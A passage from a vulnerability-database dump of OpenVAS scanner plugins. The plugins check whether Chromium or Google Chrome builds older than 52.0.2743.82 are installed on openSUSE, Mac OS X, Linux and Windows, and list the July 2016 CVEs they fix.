CVE-2016-1709: Heap-buffer-overflow in sfntly\n\n - CVE-2016-1710: Same-origin bypass in Blink\n\n - CVE-2016-1711: Same-origin bypass in Blink\n\n - CVE-2016-5127: Use-after-free in Blink\n\n - CVE-2016-5128: Same-origin bypass in V8\n\n - 
CVE-2016-5129: Memory corruption in V8\n\n - CVE-2016-5130: URL spoofing\n\n - CVE-2016-5131: Use-after-free in libxml\n\n - CVE-2016-5132: Limited same-origin bypass in Service Workers\n\n - CVE-2016-5133: Origin confusion in proxy authentication\n\n - CVE-2016-5134: URL leakage via PAC script\n\n - CVE-2016-5135: Content-Security-Policy bypass\n\n - CVE-2016-5136: Use after free in extensions\n\n - CVE-2016-5137: History sniffing with HSTS and CSP\n\n - CVE-2016-1705: Various fixes from internal audits, fuzzing and other\n initiatives\");\n\n script_tag(name:\"affected\", value:\"Chromium on openSUSE 13.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2016:1918-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.1\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.1\")\n{\n\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver\", rpm:\"chromedriver~52.0.2743.82~150.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver-debuginfo\", rpm:\"chromedriver-debuginfo~52.0.2743.82~150.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~52.0.2743.82~150.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debuginfo\", rpm:\"chromium-debuginfo~52.0.2743.82~150.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debugsource\", 
rpm:\"chromium-debugsource~52.0.2743.82~150.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-desktop-gnome\", rpm:\"chromium-desktop-gnome~52.0.2743.82~150.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-desktop-kde\", rpm:\"chromium-desktop-kde~52.0.2743.82~150.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-ffmpegsumo\", rpm:\"chromium-ffmpegsumo~52.0.2743.82~150.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-ffmpegsumo-debuginfo\", rpm:\"chromium-ffmpegsumo-debuginfo~52.0.2743.82~150.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:12:15", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2016-07-22T00:00:00", "type": "openvas", "title": "Google Chrome Security Updates(stable-channel-update-2016-07)-MAC OS X", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5129", "CVE-2016-1709", "CVE-2016-1706", "CVE-2016-1708", "CVE-2016-5134", "CVE-2016-5130", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5133", "CVE-2016-5131", "CVE-2016-1705", "CVE-2016-5135", "CVE-2016-1707", "CVE-2016-5136", "CVE-2016-5128", "CVE-2016-5132", "CVE-2016-5137", "CVE-2016-5127"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310808265", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808265", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Security Updates(stable-channel-update-2016-07)-MAC OS X\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# 
Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808265\");\n script_version(\"2019-07-17T08:15:16+0000\");\n script_cve_id(\"CVE-2016-1706\", \"CVE-2016-1707\", \"CVE-2016-1708\", \"CVE-2016-1709\",\n \"CVE-2016-1710\", \"CVE-2016-1711\", \"CVE-2016-5127\", \"CVE-2016-5128\",\n \"CVE-2016-5129\", \"CVE-2016-5130\", \"CVE-2016-5131\", \"CVE-2016-5132\",\n \"CVE-2016-5133\", \"CVE-2016-5134\", \"CVE-2016-5135\", \"CVE-2016-5136\",\n \"CVE-2016-5137\", \"CVE-2016-1705\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 08:15:16 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-07-22 13:12:56 +0530 (Fri, 22 Jul 2016)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-2016-07)-MAC OS X\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target 
host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exist due to\n\n - Sandbox escape in PPAPI\n\n - URL spoofing on iOS\n\n - Use-after-free in Extensions\n\n - Heap-buffer-overflow in sfntly\n\n - Same-origin bypass in Blink\n\n - Use-after-free in Blink\n\n - Same-origin bypass in V8\n\n - Memory corruption in V8\n\n - URL spoofing\n\n - Use-after-free in libxml\n\n - Limited same-origin bypass in Service Workers\n\n - Origin confusion in proxy authentication\n\n - URL leakage via PAC script\n\n - Content-Security-Policy bypass\n\n - Use after free in extensions\n\n - History sniffing with HSTS and CSP\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this vulnerabilities\n will allow remote attackers to bypass security, to cause denial of service and\n some unspecified impacts.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version\n prior to 52.0.2743.82 on MAC OS X\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 52.0.2743.82 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"http://googlechromereleases.blogspot.in/2016/07/stable-channel-update.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_macosx.nasl\");\n script_mandatory_keys(\"GoogleChrome/MacOSX/Version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!chr_ver = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:chr_ver, test_version:\"52.0.2743.82\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"52.0.2743.82\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:11:22", 
"description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2016-07-22T00:00:00", "type": "openvas", "title": "Google Chrome Security Updates(stable-channel-update-2016-07)-Linux", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5129", "CVE-2016-1709", "CVE-2016-1706", "CVE-2016-1708", "CVE-2016-5134", "CVE-2016-5130", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5133", "CVE-2016-5131", "CVE-2016-1705", "CVE-2016-5135", "CVE-2016-1707", "CVE-2016-5136", "CVE-2016-5128", "CVE-2016-5132", "CVE-2016-5137", "CVE-2016-5127"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310808264", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808264", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Security Updates(stable-channel-update-2016-07)-Linux\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808264\");\n script_version(\"2019-07-17T08:15:16+0000\");\n script_cve_id(\"CVE-2016-1706\", \"CVE-2016-1707\", \"CVE-2016-1708\", \"CVE-2016-1709\",\n \"CVE-2016-1710\", \"CVE-2016-1711\", \"CVE-2016-5127\", \"CVE-2016-5128\",\n \"CVE-2016-5129\", \"CVE-2016-5130\", \"CVE-2016-5131\", \"CVE-2016-5132\",\n \"CVE-2016-5133\", \"CVE-2016-5134\", \"CVE-2016-5135\", \"CVE-2016-5136\",\n \"CVE-2016-5137\", \"CVE-2016-1705\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 08:15:16 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-07-22 13:12:56 +0530 (Fri, 22 Jul 2016)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-2016-07)-Linux\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exist due to\n\n - Sandbox escape in PPAPI\n\n - URL spoofing on iOS\n\n - Use-after-free in Extensions\n\n - Heap-buffer-overflow in sfntly\n\n - Same-origin bypass in Blink\n\n - Use-after-free in Blink\n\n - Same-origin bypass in V8\n\n - Memory corruption in V8\n\n - URL spoofing\n\n - Use-after-free in libxml\n\n - Limited same-origin bypass in Service Workers\n\n - Origin confusion in proxy authentication\n\n - 
URL leakage via PAC script\n\n - Content-Security-Policy bypass\n\n - Use after free in extensions\n\n - History sniffing with HSTS and CSP\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this vulnerabilities\n will allow remote attackers to bypass security, to cause denial of service and\n some unspecified impacts.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version\n prior to 52.0.2743.82 on Linux\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 52.0.2743.82 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"http://googlechromereleases.blogspot.in/2016/07/stable-channel-update.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_lin.nasl\");\n script_mandatory_keys(\"Google-Chrome/Linux/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!chr_ver = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:chr_ver, test_version:\"52.0.2743.82\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"52.0.2743.82\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:35:15", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-08-02T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for Chromium (openSUSE-SU-2016:1865-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5129", "CVE-2016-1709", "CVE-2016-1706", "CVE-2016-1708", "CVE-2016-5134", "CVE-2016-5130", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5133", "CVE-2016-5131", "CVE-2016-1705", "CVE-2016-5135", "CVE-2016-1707", 
"CVE-2016-5136", "CVE-2016-5128", "CVE-2016-5132", "CVE-2016-5137", "CVE-2016-5127"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851369", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851369", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851369\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-08-02 10:56:28 +0530 (Tue, 02 Aug 2016)\");\n script_cve_id(\"CVE-2016-1705\", \"CVE-2016-1706\", \"CVE-2016-1707\", \"CVE-2016-1708\",\n \"CVE-2016-1709\", \"CVE-2016-1710\", \"CVE-2016-1711\", \"CVE-2016-5127\",\n \"CVE-2016-5128\", \"CVE-2016-5129\", \"CVE-2016-5130\", \"CVE-2016-5131\",\n \"CVE-2016-5132\", \"CVE-2016-5133\", \"CVE-2016-5134\", \"CVE-2016-5135\",\n \"CVE-2016-5136\", \"CVE-2016-5137\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n 
script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for Chromium (openSUSE-SU-2016:1865-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'Chromium'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Chromium was updated to 52.0.2743.82 to fix the following security issues\n (boo#989901):\n\n - CVE-2016-1706: Sandbox escape in PPAPI\n\n - CVE-2016-1707: URL spoofing on iOS\n\n - CVE-2016-1708: Use-after-free in Extensions\n\n - CVE-2016-1709: Heap-buffer-overflow in sfntly\n\n - CVE-2016-1710: Same-origin bypass in Blink\n\n - CVE-2016-1711: Same-origin bypass in Blink\n\n - CVE-2016-5127: Use-after-free in Blink\n\n - CVE-2016-5128: Same-origin bypass in V8\n\n - CVE-2016-5129: Memory corruption in V8\n\n - CVE-2016-5130: URL spoofing\n\n - CVE-2016-5131: Use-after-free in libxml\n\n - CVE-2016-5132: Limited same-origin bypass in Service Workers\n\n - CVE-2016-5133: Origin confusion in proxy authentication\n\n - CVE-2016-5134: URL leakage via PAC script\n\n - CVE-2016-5135: Content-Security-Policy bypass\n\n - CVE-2016-5136: Use after free in extensions\n\n - CVE-2016-5137: History sniffing with HSTS and CSP\n\n - CVE-2016-1705: Various fixes from internal audits, fuzzing and other\n initiatives\");\n\n script_tag(name:\"affected\", value:\"Chromium on openSUSE 13.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2016:1865-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", 
\"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.2\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.2\")\n{\n\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver\", rpm:\"chromedriver~52.0.2743.82~111.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~52.0.2743.82~111.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-desktop-gnome\", rpm:\"chromium-desktop-gnome~52.0.2743.82~111.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-desktop-kde\", rpm:\"chromium-desktop-kde~52.0.2743.82~111.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-ffmpegsumo\", rpm:\"chromium-ffmpegsumo~52.0.2743.82~111.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver-debuginfo\", rpm:\"chromedriver-debuginfo~52.0.2743.82~111.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debuginfo\", rpm:\"chromium-debuginfo~52.0.2743.82~111.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debugsource\", rpm:\"chromium-debugsource~52.0.2743.82~111.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-ffmpegsumo-debuginfo\", rpm:\"chromium-ffmpegsumo-debuginfo~52.0.2743.82~111.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:34:59", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": 
"2016-08-02T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for Chromium (openSUSE-SU-2016:1869-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5129", "CVE-2016-1709", "CVE-2016-1706", "CVE-2016-1708", "CVE-2016-5134", "CVE-2016-5130", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5133", "CVE-2016-5131", "CVE-2016-1705", "CVE-2016-5135", "CVE-2016-1707", "CVE-2016-5136", "CVE-2016-5128", "CVE-2016-5132", "CVE-2016-5137", "CVE-2016-5127"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851370", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851370", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851370\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-08-02 10:57:38 +0530 (Tue, 02 Aug 2016)\");\n script_cve_id(\"CVE-2016-1705\", \"CVE-2016-1706\", \"CVE-2016-1707\", \"CVE-2016-1708\",\n \"CVE-2016-1709\", \"CVE-2016-1710\", \"CVE-2016-1711\", \"CVE-2016-5127\",\n \"CVE-2016-5128\", \"CVE-2016-5129\", \"CVE-2016-5130\", \"CVE-2016-5131\",\n \"CVE-2016-5132\", \"CVE-2016-5133\", \"CVE-2016-5134\", \"CVE-2016-5135\",\n \"CVE-2016-5136\", \"CVE-2016-5137\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for Chromium (openSUSE-SU-2016:1869-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'Chromium'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Chromium was updated to 52.0.2743.82 to fix the following security issues\n (boo#989901):\n\n - CVE-2016-1706: Sandbox escape in PPAPI\n\n - CVE-2016-1707: URL spoofing on iOS\n\n - CVE-2016-1708: Use-after-free in Extensions\n\n - CVE-2016-1709: Heap-buffer-overflow in sfntly\n\n - CVE-2016-1710: Same-origin bypass in Blink\n\n - CVE-2016-1711: Same-origin bypass in Blink\n\n - CVE-2016-5127: Use-after-free in Blink\n\n - CVE-2016-5128: Same-origin bypass in V8\n\n - 
CVE-2016-5129: Memory corruption in V8\n\n - CVE-2016-5130: URL spoofing\n\n - CVE-2016-5131: Use-after-free in libxml\n\n - CVE-2016-5132: Limited same-origin bypass in Service Workers\n\n - CVE-2016-5133: Origin confusion in proxy authentication\n\n - CVE-2016-5134: URL leakage via PAC script\n\n - CVE-2016-5135: Content-Security-Policy bypass\n\n - CVE-2016-5136: Use after free in extensions\n\n - CVE-2016-5137: History sniffing with HSTS and CSP\n\n - CVE-2016-1705: Various fixes from internal audits, fuzzing and other\n initiatives\");\n\n script_tag(name:\"affected\", value:\"Chromium on openSUSE Leap 42.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2016:1869-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.1\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver\", rpm:\"chromedriver~52.0.2743.82~61.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~52.0.2743.82~61.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-desktop-gnome\", rpm:\"chromium-desktop-gnome~52.0.2743.82~61.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-desktop-kde\", rpm:\"chromium-desktop-kde~52.0.2743.82~61.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"chromium-ffmpegsumo\", rpm:\"chromium-ffmpegsumo~52.0.2743.82~61.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:11:42", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2016-07-22T00:00:00", "type": "openvas", "title": "Google Chrome Security Updates(stable-channel-update-2016-07)-Windows", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5129", "CVE-2016-1709", "CVE-2016-1706", "CVE-2016-1708", "CVE-2016-5134", "CVE-2016-5130", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5133", "CVE-2016-5131", "CVE-2016-1705", "CVE-2016-5135", "CVE-2016-1707", "CVE-2016-5136", "CVE-2016-5128", "CVE-2016-5132", "CVE-2016-5137", "CVE-2016-5127"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310808263", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808263", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Security Updates(stable-channel-update-2016-07)-Windows\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808263\");\n script_version(\"2019-07-17T08:15:16+0000\");\n script_cve_id(\"CVE-2016-1706\", \"CVE-2016-1707\", \"CVE-2016-1708\", \"CVE-2016-1709\",\n \"CVE-2016-1710\", \"CVE-2016-1711\", \"CVE-2016-5127\", \"CVE-2016-5128\",\n \"CVE-2016-5129\", \"CVE-2016-5130\", \"CVE-2016-5131\", \"CVE-2016-5132\",\n \"CVE-2016-5133\", \"CVE-2016-5134\", \"CVE-2016-5135\", \"CVE-2016-5136\",\n \"CVE-2016-5137\", \"CVE-2016-1705\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 08:15:16 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-07-22 13:12:56 +0530 (Fri, 22 Jul 2016)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-2016-07)-Windows\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exist due to\n\n - Sandbox escape in PPAPI\n\n - URL spoofing on iOS\n\n - Use-after-free in Extensions\n\n - Heap-buffer-overflow in sfntly\n\n - Same-origin bypass in Blink\n\n - Use-after-free in Blink\n\n - Same-origin bypass in V8\n\n - Memory corruption in V8\n\n - URL spoofing\n\n - Use-after-free in libxml\n\n - Limited same-origin bypass in Service Workers\n\n - Origin confusion in proxy authentication\n\n - 
